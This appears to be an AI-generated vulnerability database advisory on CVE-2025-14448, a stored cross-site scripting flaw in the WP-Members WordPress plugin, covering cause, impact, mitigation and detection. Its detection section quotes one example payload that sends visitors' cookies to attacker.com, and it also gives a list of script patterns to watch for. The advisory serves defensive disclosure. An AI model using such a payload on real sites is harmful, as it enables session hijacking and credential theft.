
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-14448 is a Stored Cross-Site Scripting (XSS) vulnerability in the WP-Members Membership Plugin for WordPress, affecting all versions up to and including 3.5.4.3. The flaw exists in the Multiple Checkbox and Multiple Select user profile fields due to insufficient input sanitization and output escaping. It was disclosed on January 15, 2026, by Wordfence, with a patch released on January 23, 2026. The vulnerability carries a CVSS v3.1 base score of 5.4 (Medium), assigned by Wordfence (Wordfence, Red Hat CVE).
The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a stored XSS variant. Attackers with at least Subscriber-level WordPress accounts can submit malicious JavaScript payloads through the Multiple Checkbox or Multiple Select fields in user profile forms; these inputs are stored in the database without adequate sanitization and later rendered without proper output escaping. The attack vector is network-based, requires low privileges, and necessitates user interaction (a victim visiting the injected page) to trigger payload execution (Wordfence, WordPress Patch).
Successful exploitation allows authenticated attackers to persistently inject malicious scripts that execute in the browsers of any user who visits the affected page, including administrators. Potential consequences include session hijacking, credential theft, malware distribution, and unauthorized actions performed on behalf of victims. The scope is changed (cross-site), meaning the injected script can affect users beyond the attacker's own session context, though availability is not directly impacted (Wordfence, Red Hat CVE).
There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation as of the time of disclosure (Wordfence). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. Exploitation requires a valid subscriber-level (or higher) account on the target WordPress site, limiting opportunistic mass exploitation.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a Multiple Checkbox or Multiple Select profile field.<script>, javascript:, onerror=) stored in WordPress user profile meta fields associated with WP-Members Multiple Checkbox or Multiple Select fields./wp-admin/profile.php or front-end profile pages) from low-privilege accounts containing script-like content in form parameters.Site administrators should immediately upgrade the WP-Members Membership Plugin to a version beyond 3.5.4.3, as a patch was released on January 23, 2026 (changeset 3418471) (WordPress Patch). As an interim measure, restrict or disable open subscriber-level account registration to reduce the attacker pool, and audit existing user profile fields for suspicious script content. Implementing Content Security Policy (CSP) headers can help limit the impact of any stored XSS payloads that may already exist.
Wordfence, the CNA for this CVE, published the advisory and coordinated the patch release (Wordfence). Sucuri included this vulnerability in their January 2026 vulnerability patch roundup (Sucuri Blog). Community reaction has been limited, consistent with the medium severity rating and absence of active exploitation.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."